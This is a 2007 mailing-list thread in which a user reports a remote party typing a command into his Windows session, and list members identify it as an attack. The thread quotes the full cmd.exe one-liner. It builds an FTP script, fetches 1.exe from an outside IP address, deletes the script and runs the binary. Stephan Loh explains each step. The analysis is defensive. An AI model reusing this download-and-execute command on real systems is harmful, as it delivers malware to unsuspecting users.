hi, > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo > get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
to clarify what this command line does: it writes the following text lines in a file called "ik": open 59.31.153.120 22783 user db database get 1.exe bye this are FTP commands, which are now being executed by the windows FTP client. the parameters -n -v suppresses user autologin and verboseness and the parameter -s:ik executes the content of the file "ik" as FTP commands. the file ftp://db:[EMAIL PROTECTED]:22783/1.exe is being fetched, the file "ik" is then being deleted and finally the file "1.exe" is being executed. i suppose that 1.exe is some kind of windows trojan or virus. cheers, -stephan loh On 2007.05.08 15:39, Celejar wrote: > On Tue, 8 May 2007 14:57:24 +0200 (CEST) > Jan Outhuis <[EMAIL PROTECTED]> wrote: > > > Hello, > > > > Recently I'm repeatedly being pestered by a strange event while surfing the > > net. My cursor is taken over and the following code is typed: > > > > %systemroot%\system32\cmd.exe > > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik > > &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit > > > > (I see on my network monitor that this is coming from outside; IP-number > > and user name vary.) > > > > After that all is back to normal. > > > > Now this is of course a nuisance, but is it also a thread? And what can be > > done against it? > > > > Anybody got a clue on this? > > > > Tia, > > > > Jan Outhuis > > Are you running linux or windows? With what program are you surfing? > Where is that text displayed? The cmd.exe line looks like someone > trying to open the windows command shell; the next line looks like > someone trying to capture some data from your system and ftp it > outwards. I'm just guessing, but it does appear to be a threat. > > Celejar > -- > mailmin.sourceforge.net - remote access via secure (OpenPGP) email > ssuds.sourceforge.net - A Simple Sudoku Solver and Generator > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
